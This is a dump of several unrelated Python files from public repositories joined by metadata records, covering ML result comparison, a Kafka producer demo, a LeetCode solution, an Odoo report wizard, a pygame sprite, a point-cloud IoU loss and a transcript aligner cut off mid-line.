+ results_67_joint_succed\n\n bart_success_length_prem = sum([len(i[1]) for i in bart_success]) / len(bart_success)\n text_success_length_prem = sum([len(i[1]) for i in text_success]) / len(text_success)\n graph_success_length_prem = sum([len(i[1]) for i in graph_sucess]) / len(graph_sucess)\n joint_success_length_prem = sum([len(i[1]) for i in joint_success]) / len(joint_success)\n\n bart_success_length_hypo = sum([len(i[2]) for i in bart_success]) / len(bart_success)\n text_success_length_hypo = sum([len(i[2]) for i in text_success]) / len(text_success)\n graph_success_length_hypo = sum([len(i[2]) for i in graph_sucess]) / len(graph_sucess)\n joint_success_length_hypo = sum([len(i[2]) for i in joint_success]) / len(joint_success)\n\n print(\" ---- SUCCESS ----\")\n print(\"Bart successfull premise length: \", round(bart_success_length_prem, 2))\n print(\"AMRBART Text successfull premise length: \", round(text_success_length_prem, 2))\n print(\"AMRBART Graph successfull premise length: \", round(graph_success_length_prem, 2))\n print(\"AMRBART Joint successfull premise length: \",round(joint_success_length_prem, 2))\n print(\"\\n\")\n print(\"BART successfull hypo length :\", round(bart_success_length_hypo, 2))\n print(\"AMRBART Text successfull hypo length: \", round(text_success_length_hypo, 2))\n print(\"AMRBART Graph successfull hypo length: \",round(graph_success_length_hypo,2))\n print(\"AMRBART Joint successfull hypo length: \",round(joint_success_length_hypo, 2))\n\n\n bart_failed = bart_res42_failed + bart_res17_failed + bart_res67_failed\n text_failed = res42_failed + res17_failed + res67_failed\n graph_failed = res42_failed_graph_only + res17_failed_graph_only + res67_failed_graph_only\n joint_failed = results_42_joint_failed + results_17_joint_failed + results_67_joint_failed\n\n bart_failed_length_prem = sum([len(i[1]) for i in bart_failed]) / len(bart_failed)\n text_failed_length_prem = sum([len(i[1]) for i in text_failed]) / len(text_failed)\n graph_failed_length_prem = sum([len(i[1]) for i in graph_failed]) / len(graph_failed)\n joint_failed_length_prem = sum([len(i[1]) for i in joint_failed]) / len(joint_failed)\n\n bart_failed_length_hypo = sum([len(i[2]) for i in bart_failed]) / len(bart_failed)\n text_failed_length_hypo = sum([len(i[2]) for i in text_failed]) / len(text_failed)\n graph_failed_length_hypo = sum([len(i[2]) for i in graph_failed]) / len(graph_failed)\n joint_failed_length_hypo = sum([len(i[2]) for i in joint_failed]) / len(joint_failed)\n\n print(\"\\n ---- Failed ----\")\n print(\"Bart failed premise length: \", round(bart_failed_length_prem, 2))\n print(\"AMRBART Text failed premise length: \", round(text_failed_length_prem, 2))\n print(\"AMRBART Graph failed premise length: \",round(graph_failed_length_prem, 2))\n print(\"AMRBART Joint failed premise length: \",round(joint_failed_length_prem, 2))\n print(\"\\n\")\n print(\"BART failed hypo length :\", round(bart_failed_length_hypo, 2))\n print(\"AMRBART Text failed hypo length: \", round(text_failed_length_hypo, 2))\n print(\"AMRBART Graph failed hypo length: \",round(graph_failed_length_hypo,2))\n print(\"AMRBART Joint failed hypo length: \", round(joint_failed_length_hypo, 2))\n\n\n\n # BART\n bart_res42_failed_tuples = [tuple(lst) for lst in bart_res42_failed]\n bart_res17_failed_tuples = [tuple(lst) for lst in bart_res17_failed]\n bart_res67_failed_tuples = [tuple(lst) for lst in bart_res67_failed]\n\n res42_failed_tuples = [tuple(lst) for lst in res42_failed]\n res17_failed_tuples = [tuple(lst) for lst in res17_failed]\n res67_failed_tuples = [tuple(lst) for lst in res67_failed]\n # graph\n res42_failed_tuples_graph_only = [tuple(lst) for lst in res42_failed_graph_only]\n res17_failed_tuples_graph_only = [tuple(lst) for lst in res17_failed_graph_only]\n res67_failed_tuples_graph_only = [tuple(lst) for lst in res67_failed_graph_only]\n # joint\n res42_failed_tuples_joint = [tuple(lst) for lst in results_42_joint_failed]\n res17_failed_tuples_joint = [tuple(lst) for lst in results_17_joint_failed]\n res67_failed_tuples_joint = [tuple(lst) for lst in results_67_joint_failed]\n\n # success\n # BART\n bart_res42_success_tuples = [tuple(lst) for lst in bart_res42_succed]\n bart_res17_success_tuples = [tuple(lst) for lst in bart_res17_succed]\n bart_res67_success_tuples = [tuple(lst) for lst in bart_res67_succed]\n\n res42_success_tuples = [tuple(lst) for lst in res42_succed]\n res17_success_tuples = [tuple(lst) for lst in res17_succed]\n res67_success_tuples = [tuple(lst) for lst in res67_succed]\n # graph\n res42_success_tuples_graph_only = [tuple(lst) for lst in res42_succed_graph_only]\n res17_success_tuples_graph_only = [tuple(lst) for lst in res17_succed_graph_only]\n res67_success_tuples_graph_only = [tuple(lst) for lst in res67_succed_graph_only]\n # joint\n res42_success_tuples_joint = [tuple(lst) for lst in results_42_joint_succed]\n res17_success_tuples_joint = [tuple(lst) for lst in results_17_joint_succed]\n res67_success_tuples_joint = [tuple(lst) for lst in results_67_joint_succed]\n\n\n # BART\n bart_res42_failed_set = set(bart_res42_failed_tuples)\n bart_res17_failed_set = set(bart_res17_failed_tuples)\n bart_res67_failed_set = set(bart_res67_failed_tuples)\n\n res42_failed_set = set(res42_failed_tuples)\n res17_failed_set = set(res17_failed_tuples)\n res67_failed_set = set(res67_failed_tuples)\n # graph\n res42_failed_set_graph_only = set(res42_failed_tuples_graph_only)\n res17_failed_set_graph_only = set(res17_failed_tuples_graph_only)\n res67_failed_set_graph_only = set(res67_failed_tuples_graph_only)\n # joint\n res42_failed_set_joint = set(res42_failed_tuples_joint)\n res17_failed_set_joint = set(res17_failed_tuples_joint)\n res67_failed_set_joint = set(res67_failed_tuples_joint)\n\n # succeess\n # BART\n res42_correct_set = set(bart_res42_success_tuples)\n res17_correct_set = set(bart_res17_success_tuples)\n res67_correct_set = set(bart_res67_success_tuples)\n # amrbart text\n res42_correct_set = set(res42_success_tuples)\n res17_correct_set = set(res17_success_tuples)\n res67_correct_set = set(res67_success_tuples)\n # graph\n res42_correct_set_graph_only = set(res42_success_tuples_graph_only)\n res17_correct_set_graph_only = set(res17_success_tuples_graph_only)\n res67_correct_set_graph_only = set(res67_success_tuples_graph_only)\n # joint\n res42_correct_set_joint = set(res42_success_tuples_joint)\n res17_correct_set_joint = set(res17_success_tuples_joint)\n res67_correct_set_joint = set(res67_success_tuples_joint)\n\n indices_bart = bart_indices_42.intersection(bart_indices_17, bart_indices_67)\n indices_text = indices_42.intersection(indices_17, indices_67)\n indices_graph = indices_42_graph.intersection(indices_17_graph, indices_67_graph)\n indices_joint = indices_42_joint.intersection(indices_17_joint, indices_67_joint)\n\n unified_predictions_bart = [[i,j,k] for i,j,k in zip(bart_predictions_42, bart_predictions_17, bart_predictions_67)]\n print(\"unified preds: \", unified_predictions_bart)\n\n\n print(\"\\n\")\n\n print(\"Length of errors sets (Bart): {}, {}, {} Sum: {}\".format(len(bart_res42_failed_set), len(bart_res17_failed_set),\n len(bart_res67_failed_set), len(bart_res42_failed_set) +len(bart_res17_failed_set)+ len(bart_res67_failed_set)))\n\n\n print(\"\\n Length of errors sets (text): {}, {}, {} Sum: {}\".format(len(res42_failed_set), len(res17_failed_set),\n len(res67_failed_set), len(res42_failed_set) +len(res17_failed_set)+ len(res67_failed_set)))\n\n print(\"\\n Length of errors sets (graph): {}, {}, {} Sum: {}\".format(len(res42_failed_set_graph_only),\n len(res17_failed_set_graph_only),\n len(res67_failed_set_graph_only), len(res42_failed_set_graph_only)+len(res17_failed_set_graph_only)+len(res67_failed_set_graph_only)))\n\n print(\"\\n Length of errors sets (joint): {}, {}, {} Sum: {}\".format(len(res42_failed_set_joint),\n len(res17_failed_set_joint),\n len(res67_failed_set_joint), len(res42_failed_set_joint)+len(res17_failed_set_joint)+len(res67_failed_set_joint)))\n\n print(\"\\n\")\n print_errors_and_predictions(\"Common Errors Bart\", bart_res42_failed_set.intersection(bart_res17_failed_set, bart_res67_failed_set), unified_predictions_bart, indices_bart)\n print(\"\\n\")\n print_errors_and_predictions(\"Common Errors AMRBART Text\",\n res42_failed_set.intersection(res17_failed_set, res67_failed_set),\n unified_predictions_bart, indices_bart)\n print(\"\\n\")\n print_errors_and_predictions(\"Common Errors AMRBART Graph\",\n res42_failed_set_graph_only.intersection(res17_failed_set_graph_only, res67_failed_set_graph_only),\n unified_predictions_bart, indices_bart)\n print(\"\\n\")\n print_errors_and_predictions(\"Common Errors AMRBART Joint\",\n res42_correct_set_joint.intersection(res17_correct_set_joint, res67_correct_set_joint),\n unified_predictions_bart, indices_bart)\n #\"\"\"\n print(\"\\n Common Errors BART: \\n\", *bart_res42_failed_set.intersection(bart_res17_failed_set, bart_res67_failed_set), sep=\"\\n\")\n print(\"\\n Common Errors Text: \\n\", *res42_failed_set.intersection(res17_failed_set, res67_failed_set), sep=\"\\n\")\n print(\"\\n Common Errors Graph: \\n\", *res42_failed_set_graph_only.intersection(res17_failed_set_graph_only, res67_failed_set_graph_only), sep=\"\\n\")\n print(\"\\n Common Errors Joint: \\n\",\n *res42_failed_set_joint.intersection(res17_failed_set_joint, res67_failed_set_joint), sep=\"\\n\")\n\n\n print(\"\\n Correct Instances Joint: \\n\",\n *res42_correct_set_joint.intersection(res17_correct_set_joint, res67_correct_set_joint), sep=\"\\n\")\n\n #print(\"\\n Common Errors Joint: \\n\", *res42_failed_set_joint.intersection(res17_failed_set_joint, res67_failed_set_joint), sep=\"\\n\")\n\n \"\"\"\n\n model_set_bart = bart_res42_failed_set.intersection(bart_res17_failed_set, bart_res67_failed_set)\n model_set_1 = res42_failed_set.intersection(res17_failed_set, res67_failed_set)\n model_set_2 = res42_failed_set_graph_only.intersection(res17_failed_set_graph_only, res67_failed_set_graph_only)\n model_set_3 = res42_failed_set_joint.intersection(res17_failed_set_joint, res67_failed_set_joint)\n\n intersection_between_models = model_set_bart & model_set_1 & model_set_2 & model_set_3 # model_set_1.intersection(model_set_2)\n intersection_between_indices = indices_bart & indices_text & indices_graph & indices_joint\n\n print(len(intersection_between_models), len(intersection_between_indices))\n #print(\"\\n Intersection of common errors: \\n\", *intersection_between_models, sep=\"\\n\")\n for instance, idx in zip(intersection_between_models, intersection_between_indices):\n print(instance, idx)\n print(\"Bart 42: \", bart_predictions_42[idx])\n print(\"Bart 17: \", bart_predictions_17[idx])\n print(\"Bart 67: \", bart_predictions_67[idx])\n\n print(\"Text 42: \", predictions_42[idx])\n print(\"Text 17: \", predictions_17[idx])\n print(\"Text 67: \", predictions_67[idx])\n\n print(\"Graph 42: \", predictions_42_graph[idx])\n print(\"Graph 17: \", predictions_17_graph[idx])\n print(\"Graph 67: \", predictions_67_graph[idx])\n\n print(\"Joint 42: \", predictions_42_joint[idx])\n print(\"Joint 17: \", predictions_17_joint[idx])\n print(\"Joint 67: \", predictions_67_joint[idx])\n\n\n print(\"Text 42: \", predictions_42)\n print(\"Text 17: \", predictions_17)\n print(\"Text 67: \", predictions_67)\n\n\n print(\"Graph 42 \", predictions_42_graph)\n print(\"Graph 17 \",predictions_17_graph)\n print(\"Graph 67 \",predictions_67_graph)\n\n print(\"Joint 42 \",predictions_42_joint)\n print(\"Joint 17 \",predictions_17_joint)\n print(\"Joint 67 \",predictions_67_joint)\n #\"\"\"\n\n\n\n\n\n\n\n","repo_name":"PhMeier/MA_Thesis","sub_path":"evaluation/classification/compare_veridicality_results_per_signature.py","file_name":"compare_veridicality_results_per_signature.py","file_ext":"py","file_size_in_byte":25884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38408047688","text":"from kafka import KafkaProducer\nimport time\n#pip3 install kafka-python\n\ndef main():\n\n producer = KafkaProducer(bootstrap_servers='localhost:9092')\n file = open(\"/home/hduser/hive/data/custs\",\"r\")\n filedata = file.readlines()\n for line in filedata:\n producer.send('my_topic', value=bytes(line,'utf-8'))\n producer.flush()\n print(\"Pushed\")\n time.sleep(3)\n \n \nmain()","repo_name":"inceptez27/pysparkworkouts","sub_path":"src/kafkaops/kproducer.py","file_name":"kproducer.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4295797231","text":"from typing import List\nclass Solution:\n def plusOne(self, digits: List[int]) -> List[int]:\n integer_from_array = int(\"\".join(str(e) for e in digits))\n incremented_integer = integer_from_array + 1\n new_array = [int(i) for i in str(incremented_integer)]\n return new_array\n\n\n# Running in terminal/console:\nif __name__ == '__main__':\n Instant = Solution()\n Solve = Instant.plusOne(digits = [1,2,3]) # digits = [1,2,3] ->[1,2,4] | digits = [4,3,2,1] -> [4,3,2,2]\n print(Solve)\n","repo_name":"aurimas13/Solutions-To-Problems","sub_path":"LeetCode/Python Solutions/Plus One/plus_one.py","file_name":"plus_one.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"63"} +{"seq_id":"10433102012","text":"#!/usr/bin/env python\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nconfig = {\n 'description': '<%= projectName %>',\n 'author': '<%= author %>',\n 'url': '<%= downloadUrl %>',\n 'download_url': '<%= downloadUrl %>',\n 'author_email': '<%= email %>',\n 'version': '0.0.1',\n 'install_requires': [],\n 'packages': ['<%= projectName %>'],\n 'scripts': [],\n 'name': '<%= projectName %>'\n}\n\nsetup(**config)\n","repo_name":"danie1cohen/generator-python-project","sub_path":"generators/app/templates/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"13138279146","text":"class Alumno:\n\n def __init__(self,nombre,nota) -> None:\n self.nombre=nombre\n self.nota=nota\n\n def aprobado(self):\n if self.nota >= 6:\n print(f'{self.nombre} ha aprobado con una nota de {self.nota}')\n else:\n print(f'{self.nombre} ha desaprobado con una nota de {self.nota}')\n\nalumno1= Alumno('Alfredo',8)\nalumno1.aprobado()","repo_name":"andres408/openbootcamp","sub_path":"alumno.py","file_name":"alumno.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23711625272","text":"import numpy as np\nprint('numpy:', np.__version__)\n\n# import tensorflow as tf\n# print('tensroflow:', tf.__version__)\n\n# from tensorflow import keras\n# print('keras:', keras.__version__)\n\nimport tensorflow.lite as tflite\n#print('tflite:', tflite.__version__)\n\n\nsample_input = np.array(np.load('image_20210410181812.npy', allow_pickle=True)[94:594, 236:736, :]/255.0, dtype=np.float32)\nsample_input = np.reshape(sample_input, [1, 500, 500, 3])\nprint('image loaded as', sample_input.shape, type(sample_input))\n\ninterpreter = tflite.Interpreter(model_path='model-202104182124.tflite')\nprint('interpreter loaded', type(interpreter))\n\ninterpreter.allocate_tensors()\n\n# Get input and output tensors.\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\nprint(input_details)\nprint(output_details)\n\n# Test the model on random input data.\ninterpreter.set_tensor(input_details[0]['index'], sample_input)\n\ninterpreter.invoke()\n\n# The function `get_tensor()` returns a copy of the tensor data.\n# Use `tensor()` in order to get a pointer to the tensor.\noutput_data = interpreter.get_tensor(output_details[0]['index'])\nprint(output_data)\n","repo_name":"LiamAkkerman/Jar-Vision-System","sub_path":"pi/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6826858492","text":"import pandas as pd\nfrom datetime import datetime\nfrom matplotlib import pyplot as plt\n\nplt.rcParams[\"figure.figsize\"] = [5, 6]\nplt.rcParams[\"figure.autolayout\"] = True\n\nheaders = ['Tag', 'Start', 'End', 'Mean', 'Min', 'Max', 'Std', 'Cnt']\ndf = pd.read_csv('C:/Users/User/Documents/MS-Projects/test/test.csv', parse_dates=True, names=headers)\ndf['Start'] = df['Start'].map(lambda x: datetime.strptime(str(x), '%Y-%m-%d %H:%M:%S'))\nprint(df)\nnames = ['Function2','{}Function2']\ndf=df[df.Tag.isin(names)]\ndf = df.pivot(index='Start', columns='Tag', values='Mean')\ndf.plot()\nplt.show()\n","repo_name":"venkateshatchutha/AVRBank","sub_path":"chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16782465108","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError\n\n\nclass sell_receipt_wizard(models.TransientModel):\n _name = 'sell.receipt.wizard'\n _description = u'销售收款一览表向导'\n\n @api.model\n def _default_date_start(self):\n return self.env.user.company_id.start_date\n\n @api.model\n def _default_date_end(self):\n return date.today()\n\n date_start = fields.Date(u'开始日期', default=_default_date_start,\n help=u'报表汇总的开始日期,默认为公司启用日期')\n date_end = fields.Date(u'结束日期', default=_default_date_end,\n help=u'报表汇总的结束日期,默认为当前日期')\n c_category_id = fields.Many2one('core.category', u'客户类别',\n domain=[('type', '=', 'customer')],\n context={'type': 'customer'},\n help=u'按指定客户类别进行统计')\n partner_id = fields.Many2one('partner', u'客户',\n help=u'按指定客户进行统计')\n user_id = fields.Many2one('res.users', u'销售员',\n help=u'按指定销售员进行统计')\n warehouse_id = fields.Many2one('warehouse', u'仓库',\n help=u'按指定仓库进行统计')\n company_id = fields.Many2one(\n 'res.company',\n string=u'公司',\n change_default=True,\n default=lambda self: self.env['res.company']._company_default_get())\n\n def _get_domain(self):\n '''返回wizard界面上条件'''\n cond = [('date', '>=', self.date_start),\n ('date', '<=', self.date_end),\n ('state', '=', 'done')]\n if self.c_category_id:\n cond.append(\n ('partner_id.c_category_id', '=', self.c_category_id.id)\n )\n if self.partner_id:\n cond.append(('partner_id', '=', self.partner_id.id))\n if self.user_id:\n cond.append(('user_id', '=', self.user_id.id))\n if self.warehouse_id:\n cond += ['|',('warehouse_id', '=', self.warehouse_id.id),\n ('warehouse_dest_id', '=', self.warehouse_id.id)]\n return cond\n\n def _compute_receipt(self, delivery):\n '''计算该发货单的已收款'''\n receipt = 0\n for order in self.env['money.order'].search(\n [('state', '=', 'done')], order='name'):\n for source in order.source_ids:\n if source.name.name == delivery.name:\n receipt += source.this_reconcile\n return receipt\n\n def _prepare_sell_receipt(self, delivery):\n '''对于传入的发货单/退货单,为创建销售收款一览表准备数据'''\n self.ensure_one()\n factor = delivery.is_return and -1 or 1 # 如果是退货则金额均取反\n sell_amount = factor * (delivery.discount_amount + delivery.amount)\n discount_amount = factor * delivery.discount_amount\n amount = factor * delivery.amount\n partner_cost = factor * delivery.partner_cost\n order_type = not delivery.is_return and u'普通销售' or u'销售退回'\n warehouse = not delivery.is_return and delivery.warehouse_id or delivery.warehouse_dest_id\n # 计算该发货单的已收款\n receipt = self._compute_receipt(delivery)\n # 计算回款率\n receipt_rate = (amount + partner_cost) != 0 and (receipt / (amount + partner_cost)) * 100 or 0\n return {\n 'c_category_id': delivery.partner_id.c_category_id.id,\n 'partner_id': delivery.partner_id.id,\n 'user_id': delivery.user_id.id,\n 'type': order_type,\n 'date': delivery.date,\n 'order_name': delivery.name,\n 'warehouse_id': warehouse.id,\n 'sell_amount': sell_amount,\n 'discount_amount': discount_amount,\n 'amount': amount,\n 'partner_cost': partner_cost,\n 'receipt': receipt,\n 'balance': amount + partner_cost - receipt,\n 'receipt_rate': receipt_rate,\n 'note': delivery.note,\n }\n\n @api.multi\n def button_ok(self):\n self.ensure_one()\n res = []\n if self.date_end < self.date_start:\n raise UserError(u'开始日期不能大于结束日期!\\n 所选的开始日期:%s 结束日期:%s'%(self.date_start, self.date_end))\n\n delivery_obj = self.env['sell.delivery']\n for delivery in delivery_obj.search(self._get_domain(), order='partner_id'):\n # 用查找到的发货单信息来创建一览表\n line = self.env['sell.receipt'].create(\n self._prepare_sell_receipt(delivery))\n res.append(line.id)\n\n return {\n 'name': u'销售收款一览表',\n 'view_mode': 'tree',\n 'res_model': 'sell.receipt',\n 'type': 'ir.actions.act_window',\n 'domain': [('id', 'in', res)],\n 'limit': 65535,\n }\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/44384_sell_receipt_wizard.py","file_name":"44384_sell_receipt_wizard.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"9272003936","text":"import pygame\nimport os\nimport constantes\nimport random\n\n\nclass TelaInicio(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imagens_bola = []\n self.carregar_arquivos()\n tamanho = random.randrange(16, 32)\n for i in range(8):\n imagem = self.sprite_sheet_bola.subsurface((i*32, 0), (32, 32))\n imagem = pygame.transform.scale(imagem, (tamanho, tamanho))\n self.imagens_bola.append(imagem)\n self.index_lista = 0\n self.image = self.imagens_bola[self.index_lista]\n self.rect = self.image.get_rect()\n self.mask = pygame.mask.from_surface(self.image)\n self.rect.center = (random.randrange(\n 0, constantes.LARGURA_TELA), constantes.ALTURA_TELA)\n\n def update(self):\n self.rect.y += -1\n if self.rect.bottomleft[1] <= 0 or self.rect.collidepoint(pygame.mouse.get_pos()):\n self.kill()\n if self.index_lista > 7:\n self.index_lista = 0\n self.index_lista += 0.25\n self.image = self.imagens_bola[int(self.index_lista)]\n\n def carregar_arquivos(self):\n # Carrega as imagens correspondentes a classe Bola\n diretorio_imagens_bola = os.path.join(os.getcwd(), 'imagens')\n self.sprite_sheet_bola = pygame.image.load(os.path.join(\n diretorio_imagens_bola, constantes.IMAGEM_BOLA)).convert_alpha()\n","repo_name":"gsillva18/Fire-Ball-Game","sub_path":"fireball/classes/tela_inicio.py","file_name":"tela_inicio.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1812983565","text":"import torch\nimport torch.nn as nn\nfrom ops.roiaware_pool3d import roiaware_pool3d_cuda\nimport matplotlib.pyplot as plt\nfrom cnn_utils import draw_box_plt\nfrom utils import common_utils\n\nclass PointsLoss(nn.Module):\n def __init__(self):\n super().__init__()\n return\n\n def forward(self, added_points, original_points, boxes, ego_loc):\n \"\"\"\n :param added_points: prdicted points\n :param original_point:\n :param boxes:\n :return:\n \"\"\"\n original_points = original_points[:, 1:, :, :]\n # matrix to 3d points\n # sum every coop\n\n predicted_points = torch.sum(added_points, dim=1)\n # predicted_points = torch.dot(predicted_points, torch.linalg.inv(tf_ego).float())\n original_points = torch.sum(original_points, dim=1)\n # original_points= torch.dot(original_points, torch.linalg.inv(tf_ego).float())\n # ==========================================vis============================================\n plt.subplot(1,2,1)\n plt.imshow(predicted_points[0,:,:].cpu().detach().numpy())\n plt.subplot(1,2,2)\n plt.imshow(original_points[0,:,:].cpu().detach().numpy())\n plt.savefig('diff.png')\n plt.close()\n\n # =========================================================================================\n\n # for every frame\n batch_size = original_points.shape[0]\n p = []\n o = []\n for i in range(batch_size):\n p.append(torch.nonzero(predicted_points[i,:,:], as_tuple=False))\n o.append(torch.nonzero(original_points[i,:,:], as_tuple=False))\n boxes_frame = boxes\n # fill with zeros\n if len(p[0]) > len(p[1]):\n p[1]=torch.cat((p[1],torch.zeros(len(p[0]) - len(p[1]),2).cuda()),dim=0)\n else:\n p[0] = torch.cat((p[0], torch.zeros(len(p[1]) - len(p[0]),2).cuda()),dim=0)\n if len(o[0]) > len(o[1]):\n o[1] = torch.cat((o[1], torch.zeros(len(o[0]) - len(o[1]), 2).cuda()), dim=0)\n else:\n o[0] = torch.cat((o[0], torch.zeros(len(o[1]) - len(o[0]), 2).cuda()), dim=0)\n predicted_points_idx = torch.stack(p, 0)-128\n original_points_idx = torch.stack(o, 0)-128\n # set z = 1\n y1 = torch.zeros(2, predicted_points_idx.shape[1], 1).cuda()\n predicted_points_idx = torch.cat((predicted_points_idx, y1), dim=2)*0.8\n y2 = torch.zeros(2, original_points_idx.shape[1], 1).cuda()\n original_points_idx = torch.cat((original_points_idx, y2), dim=2)*0.8\n\n # =============================vis============================================\n ax = plt.figure(figsize=(8, 8)).add_subplot(1, 1, 1)\n points = predicted_points_idx.cpu()\n ax.plot(points[0,:, 0], points[0,:, 1], 'b.', markersize=0.5)\n boxes_frame[:,:,0:2] = boxes_frame[:,:,0:2] - ego_loc[:,None,:]\n ax = draw_box_plt(boxes_frame[0,:,:], ax, color='green')\n # ax = draw_box_plt(pred_boxes[0], ax, color='red')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.savefig('temp.png')\n plt.close()\n # ==============================================================================\n for i in range(batch_size):\n idx_original = self.points_in_boxes_gpu(original_points_idx[i,:,:].float().unsqueeze(0), boxes_frame[i,:,:].float().unsqueeze(0))\n idx_predict = self.points_in_boxes_gpu(predicted_points_idx[i,:,:].float().unsqueeze(0), boxes_frame[i,:,:].float().unsqueeze(0))\n\n o_idx = torch.where(idx_original != -1)\n p_idx = torch.where(idx_predict != -1)\n n_object = original_points_idx[o_idx]\n n_predict = predicted_points_idx[p_idx]\n\n # in grid\n n_object_grid = torch.zeros(256, 256)\n n_predict_grid = torch.zeros(256, 256)\n x =n_object[:, 0]\n y =n_object[:, 1]\n inds_x = (x / 0.8 + 256 / 2).long()\n inds_y = (y / 0.8 + 256 / 2).long()\n n_object_grid[inds_x, inds_y] = 1\n n_object_grid = n_object_grid.bool()\n\n x1 = n_predict[:, 0]\n y1 = n_predict[:, 1]\n inds_x = (x1 / 0.8 + 256 / 2).long()\n inds_y = (y1 / 0.8 + 256 / 2).long()\n n_predict_grid[inds_x, inds_y] = 1\n n_predict_grid = n_predict_grid.bool()\n intersection = ((n_object_grid & n_predict_grid)==True).sum().float()\n union = ((n_object_grid | n_predict_grid)==True).sum().float()\n iou = intersection/union\n return iou\n\n def points_in_boxes_gpu(self, points, boxes):\n \"\"\"Find points that are in boxes (CUDA)\n Args:\n points (torch.Tensor): [B, M, 3], [x, y, z] in LiDAR coordinate\n boxes (torch.Tensor): [B, T, 7],\n num_valid_boxes <= T, [x, y, z, w, l, h, ry] in LiDAR coordinate,\n (x, y, z) is the bottom center\n Returns:\n box_idxs_of_pts (torch.Tensor): (B, M), default background = -1\n \"\"\"\n assert boxes.shape[0] == points.shape[0]\n assert boxes.shape[2] == 7 and points.shape[2] == 3\n batch_size, num_points, _ = points.shape\n\n box_idxs_of_pts = points.new_zeros((batch_size, num_points), dtype=torch.int).fill_(-1)\n # If manually put the tensor 'points' or 'boxes' on a device\n # which is not the current device, some temporary variables\n # will be created on the current device in the cuda op,\n # and the output will be incorrect.\n # Therefore, we force the current device to be the same\n # as the device of the tensors if it was not.\n # Please refer to https://github.com/open-mmlab/mmdetection3d/issues/305\n # for the incorrect output before the fix.\n points_device = points.get_device()\n assert points_device == boxes.get_device(), \\\n 'Points and boxes should be put on the same device'\n if torch.cuda.current_device() != points_device:\n torch.cuda.set_device(points_device)\n roiaware_pool3d_cuda.points_in_boxes_gpu(boxes.contiguous(), points.contiguous(), box_idxs_of_pts)\n\n return box_idxs_of_pts\n\n def points_in_boxes_cpu(self, points, boxes):\n \"\"\"\n Args:\n points: (num_points, 3)\n boxes: [x, y, z, dx, dy, dz, heading], (x, y, z) is the box center, each box DO NOT overlaps\n Returns:\n point_indices: (N, num_points)\n \"\"\"\n assert boxes.shape[1] == 7\n assert points.shape[1] == 3\n points, is_numpy = common_utils.check_numpy_to_torch(points)\n boxes, is_numpy = common_utils.check_numpy_to_torch(boxes)\n\n point_indices = points.new_zeros((boxes.shape[0], points.shape[0]), dtype=torch.int)\n roiaware_pool3d_cuda.points_in_boxes_gpu(boxes.float().contiguous(), points.float().contiguous(), point_indices)\n\n return point_indices.numpy() if is_numpy else point_indices","repo_name":"YuqiaoBai/cia_ssd","sub_path":"CNN/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":6966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"9125985441","text":"import re\nfrom math import ceil\n\n\n# CLASS\nclass Aligner:\n \"\"\"\n Class that does the aligning of text according to a rule.\n \"\"\"\n\n # Dunder methods\n def __init__(self, transcript, timetable):\n \"\"\"\n Initialisation method.\n\n Args:\n transcript (str):\n The raw transcript of the audio.\n\n timetable (list[dict]):\n The timetable of the spoken words, as returned by the gentle interface.\n \"\"\"\n\n # Object attributes\n self.transcript = transcript\n self.timetable = timetable\n self.duration = int(ceil(timetable[-1][\"end\"])) # Get the time that the last word was spoken\n\n # Methods\n def align_time(self, block_duration=5):\n \"\"\"\n Method that aligns the transcript by time.\n\n Args:\n block_duration (float):\n The length of time that makes up each block.\n Every block will have its own transcript section.\n (Default = 5)\n\n Returns:\n list[dict]:\n The aligned text dictionary.\n\n Raises:\n AssertionError:\n - If the value of `block_duration` is less than 3.\n - If `self.duration` is less than or equal to `block_duration`.\n \"\"\"\n\n # Assert that the value of `block_duration` is valid\n assert block_duration >= 3, \"The value of `block_duration` must be more than 3.\"\n assert self.duration > block_duration, \"The length of the audio file is less than the block \" \\\n f\"duration {block_duration}.\"\n\n # Calculate the number of blocks\n num_blocks = int(ceil(self.duration / block_duration))\n\n # Count the total number of processed words\n num_processed_words = len(self.timetable) # Of course, some of the words may not have been processed\n\n # Start creating the aligned transcript\n aligned_words = []\n curr_processed_word_index = 0 # Stores the current processed word index\n\n for block_num in range(num_blocks):\n # Get as many words as possible before exceeding the block\n start_processed_word_index = curr_processed_word_index\n\n while curr_processed_word_index < num_processed_words:\n # Get the current word\n curr_word = self.timetable[curr_processed_word_index]\n\n # Check if the ending of that word is still in the block\n if \"end\" in curr_word and curr_word[\"end\"] > (block_num + 1) * block_duration:\n # The ending exceeded the block => the block has ended, so break\n break\n\n # The word is still in the block, append to the list of block words\n curr_processed_word_index += 1\n\n # Get the index of the last processed word inside the block\n end_processed_word_index = curr_processed_word_index - 1 # The current word is not in the block\n\n # Get the processed words that 